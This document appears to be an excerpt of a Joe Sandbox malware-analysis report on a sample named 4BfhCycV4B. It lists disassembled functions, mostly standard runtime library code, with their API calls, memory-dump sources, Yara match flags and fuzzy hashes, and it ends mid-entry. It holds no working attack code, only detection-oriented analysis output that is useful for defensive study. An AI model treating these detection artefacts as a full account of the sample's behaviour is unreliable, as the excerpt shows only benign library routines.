                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
                                                                                                                                                                                                                                                                                        • Instruction ID: 5b05d58ac5b734da0df57961154f35ff215c4bde29656fbdba69a9a1d0d2d488
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD415A31730221FBEB246FB88D84A6E3AE4EF55374F250295F424E62F0EE76B5408271
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421B690 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042D740,00000000,00000000,8B56FF8B,04214002,?,00000004,00000001,0042D740,0000007F,?,8B56FF8B,00000001), ref: 0421B6DD
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0421B766
                                                                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0421B778
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0421B781
                                                                                                                                                                                                                                                                                          • Part of subcall function 04217CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04217CDE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
                                                                                                                                                                                                                                                                                        • Instruction ID: 6f3dfcaec2836d1df052e9f0903c979fd1535f770e73db7c289a7313560154c2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5131B072B2020AABDF258F64DC80EAE7BF5EF54310B0542A8EC14D61A0EB35F955CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040CCA4 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55
                                                                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0040CCD3
                                                                                                                                                                                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
                                                                                                                                                                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                                                                        • Instruction ID: 6cd8a4fdf9e309ef40a66346d060796d29459ceaa081db5c793327cde4683266
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA012D72500108BBDF116F96CC81DEB3F69EF98758F044129FE0866261C73AE861DBA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420CF0B Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0420CF25
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420CE72: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0420CEA1
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420CE72: ___AdjustPointer.LIBCMT ref: 0420CEBC
                                                                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0420CF3A
                                                                                                                                                                                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0420CF4B
                                                                                                                                                                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0420CF73
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                                                                        • Instruction ID: 379c9f71f31fa53964457041751acf35cbc255f8ee0ae0633b5271d1daa23dd2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C012D72610109BBDF126E96CC44DEB7FA9FF98754F048114FE0896161D735E861DBA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042174BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0420ED94,00000000,00000000,?,04217461,0420ED94,00000000,00000000,00000000,?,04217719,00000006,0042E2F8), ref: 042174EC
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,04217461,0420ED94,00000000,00000000,00000000,?,04217719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000,00000364,?,04217052), ref: 042174F8
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04217461,0420ED94,00000000,00000000,00000000,?,04217719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000), ref: 04217506
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                                                                        • Instruction ID: feb69fb19ba9b0876fc6ba10d06623ec2ae8512bf12fead91f4a78aad74970d3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF012432362223ABC7308F28AC44A5A3BD8AFE47E17514534FD07E31A0EB30E801C6E4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                        • String ID: pow
                                                                                                                                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                        • Opcode ID: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                                                                        • Instruction ID: e0eefe9174cd7462181434ea84c362ca9420c476202b864f0baa4bab5f354a80
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D515DB1B5420196C7217B19CE813EB2B90EB40744F64496BE085C23E8EB7D8CE7DA4E
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041E281 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                                        • String ID: "A
                                                                                                                                                                                                                                                                                        • API String ID: 546120528-1838006985
                                                                                                                                                                                                                                                                                        • Opcode ID: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                                                                        • Instruction ID: 9adfac426f14955098f9a8953225ebda5108e0851b5f4a0d8690ab915da4ef9e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F511774A002499EDB208F36C8846FBBBE5EF51304F14446FD8A68B251D73D95C6CB99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042265BB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 042265C0
                                                                                                                                                                                                                                                                                          • Part of subcall function 04204073: __EH_prolog.LIBCMT ref: 04204078
                                                                                                                                                                                                                                                                                          • Part of subcall function 04204073: std::locale::_Init.LIBCPMT ref: 0420409A
                                                                                                                                                                                                                                                                                        • _Deallocate.LIBCONCRT ref: 04226714
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$DeallocateInitstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID: hzB
                                                                                                                                                                                                                                                                                        • API String ID: 2389838984-4102550090
                                                                                                                                                                                                                                                                                        • Opcode ID: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
                                                                                                                                                                                                                                                                                        • Instruction ID: 94acf870a79bab724e8954a7d1dbce00e9be7f9c988d8b80eea5e884f4c639e1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5251CD71A21248DFEB04DFA8C9909EDFBF5FF48304F64822EE405A7282D734AA45CB50
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041DF2C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Info
                                                                                                                                                                                                                                                                                        • String ID: $^A
                                                                                                                                                                                                                                                                                        • API String ID: 1807457897-1499568600
                                                                                                                                                                                                                                                                                        • Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                                                                        • Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420CA17 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0420CA4A
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0420CB03
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                                                                        • Instruction ID: 3ece605c64782489ba64d92125b8c95b344588acd263c2877fdf4ae55ff647f5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B941A4B0B202099BDF14DF69C880AAEBBF5EF45318F14C266D915AB2D2D771B905CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041FEC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                        • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                                                                        • Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04220129 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,04220384,?,00000050,?,?,?,?,?), ref: 04220204
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                        • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                                                                        • Instruction ID: 812bf744f4f945736296ebe98081f68931bcc8756a572a4827f75144e80a2751
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B21C462B30226B6E7348E54CF01BA772A6AB94B51F464565EB0AE7104FB32F941C350
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042033DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 042033E1
                                                                                                                                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 04203428
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: __EH_prolog3.LIBCMT ref: 04207FE1
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::_Lockit::_Lockit.LIBCPMT ref: 04207FEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::locale::_Setgloballocale.LIBCPMT ref: 04208007
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: _Yarn.LIBCPMT ref: 0420801D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 0420805D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: __EH_prolog.LIBCMT ref: 04203656
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::_Lockit::_Lockit.LIBCPMT ref: 04203665
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: int.LIBCPMT ref: 0420367C
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::locale::_Getfacet.LIBCPMT ref: 04203685
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::_Lockit::~_Lockit.LIBCPMT ref: 042036CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 04201AE6: __CxxThrowException@8.LIBVCRUNTIME ref: 04201B30
                                                                                                                                                                                                                                                                                          • Part of subcall function 04201AE6: std::system_error::system_error.LIBCPMT ref: 04201B3F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Exception@8GetfacetH_prolog3InitSetgloballocaleThrowYarnstd::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID: =wB
                                                                                                                                                                                                                                                                                        • API String ID: 372095707-727605340
                                                                                                                                                                                                                                                                                        • Opcode ID: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                                                                        • Instruction ID: 9cad5336f903adfb5074a58e01d09bb3cfb6f77cf6ea4282fecd13f96a425292
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 262124B1A10A0AAFE714DF6AC185A59FBF0FB09314F50822ED0199BA81D774F964CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04204073 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 04204078
                                                                                                                                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 0420409A
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: __EH_prolog3.LIBCMT ref: 04207FE1
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::_Lockit::_Lockit.LIBCPMT ref: 04207FEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::locale::_Setgloballocale.LIBCPMT ref: 04208007
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: _Yarn.LIBCPMT ref: 0420801D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 0420805D
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: __EH_prolog.LIBCMT ref: 042043F5
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: std::_Lockit::_Lockit.LIBCPMT ref: 04204404
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: int.LIBCPMT ref: 0420441B
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: std::locale::_Getfacet.LIBCPMT ref: 04204424
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0420446B
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: __EH_prolog.LIBCMT ref: 04203656
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::_Lockit::_Lockit.LIBCPMT ref: 04203665
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: int.LIBCPMT ref: 0420367C
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::locale::_Getfacet.LIBCPMT ref: 04203685
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::_Lockit::~_Lockit.LIBCPMT ref: 042036CC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
